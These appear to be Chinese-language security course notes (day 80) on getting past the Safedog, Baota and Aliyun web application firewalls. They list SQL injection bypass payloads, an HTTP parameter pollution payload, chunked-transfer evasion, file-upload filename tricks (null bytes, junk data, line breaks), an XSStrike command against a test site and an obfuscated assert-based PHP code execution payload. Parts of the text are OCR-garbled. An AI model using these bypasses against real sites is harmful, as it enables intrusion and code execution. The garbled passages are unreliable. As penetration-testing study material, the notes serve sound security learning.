第80天 WAF攻防-漏洞利用&HPP污染&分块传输&垃圾数据
参考点:
#将MySQL注入函数分为几类
拆分字符串函数:mid、1eft、1pad等
编码函数:ord、hex、a3ci等
运算函数:±*/&^!1 ike rlike reg等
空格替换部分:09、0a、0b、0c、0d等
关键数据函数:user()、version()、database()等
然后将这些不同类型的函数组合拼接在一起
上传参数名解析:明确哪些东西能修政?
Content-Di3 position:一般可更改
name:表单参数值,不能更改
filename:文件名,可以更改
Content-Type:文件MIME,视情况更改
演示案例:
安全狗-SQL注入&文件上传-知识点
安全狗-文件包含&代码执行-知识点
BT&Aliyun-SQL注入&文件上传-知识点
BT&Aliyun-文件包含&代码执行-知识点
安全狗-SQL注入&文件上传-知识点
SQL注入 https://www.cnblogs.com/cute-puli/p/11146625.html
关键字替换
使用like 代替 and
更换提交方式:
POST id=-1 union select 1,2,3–+
更改POST提交编码格式
模拟文件上传传递数据
分块传输:更改数据请求格式
前提提交方式必须为POST
https://github.com/cOny1/chunked-coding-converter
HPP参数污染:id=1/**&id=-1号20 union号203e1ect号201,2,3号23*/
文件上传:换行解析&垃圾溢出&00干扰&=符号干扰&参数模拟
filename=a.php
filename="a.php
filename=“a.php号%00”
垃圾数据;filename=“a.php”
无限filename;filename=“a,php”
filename==“a.php”
filename=“name='uploadfile.php”
filename=“Content-Disposition:form-data.php”
filename==“a.ph
p”
BT&Aliyun-文件包含&代码执行-知识点
https://github.com/s0md3v/XSStrike
python xsstrike.py -u
“http://test.xiaodi8.com/pikachu/vul/xss/xss reflected get.php?mes
sage=1&submit=submit”–proxy
txt=Sy=str replace(‘x’,‘’,‘pxhpxinxfo()’);assert ($y);&submit=8688
F응90응E4용BA응A4
文件包含:没什么好说的就这几种
…·/…1等
安全狗:
注入ss文件上传拦截
rce文件包含等其他不拦截
宝塔:
注入上传拦截
rce文件包含Xss等其他不拦截
其中拦截的是关键字
aliyun
拦截的CC速度和后门信息收集和权限维持阶段拦截
漏洞利用他不拦截默认的版本(升级版本没测试)